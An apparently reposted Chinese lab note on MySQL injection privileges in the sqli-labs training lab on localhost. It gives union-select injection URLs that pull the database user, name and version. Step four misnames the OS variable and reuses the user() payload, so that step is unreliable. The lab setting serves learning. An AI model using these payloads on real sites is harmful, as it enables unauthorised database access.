(2020上半年第7天)小迪网络安全笔记(操作③)Mysql注入中的权限问题

Posted .白菜白菜大白菜.

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了(2020上半年第7天)小迪网络安全笔记(操作③)Mysql注入中的权限问题相关的知识,希望对你有一定的参考价值。

mysql注入中的权限由连接数据库的用户决定,谁链接谁权限sqlilabs一到七关(不同数据库方法不一样)
User()查询数据库用户
Database()查询数据库库名
Version()查询数据库版本
@@compile_version_os查询操作系统

下面我们做以下操作:(phpstudypro+phpmyadmin+sqlilabs第二关)
在这里插入图片描述

①User()查询数据库用户:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,user(),3 --+
效果:在这里插入图片描述

②Database()查询数据库库名:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,database(),3 --+
效果:在这里插入图片描述

③Version()查询数据库版本:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,version(),3 --+
效果:在这里插入图片描述

④@@compile_version_os查询操作系统:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,user(),3 --+
效果:在这里插入图片描述

以上是关于(2020上半年第7天)小迪网络安全笔记(操作③)Mysql注入中的权限问题的主要内容,如果未能解决你的问题,请参考以下文章

(2020上半年第8天(SQL注入-MYSQL注入(SQL注入3/10)))小迪网络安全笔记

(2020上半年第7天)小迪网络安全笔记(操作④)Root用户注入攻击

(2020上半年第2天(信息收集1/2))小迪网络安全笔记

(2020上半年第5天(漏洞发现))小迪网络安全笔记

(2020上半年第8天)小迪网络安全笔记(操作③)php函数加密

(2020上半年第7天)小迪网络安全笔记(操作①)mysql基本注入流程演示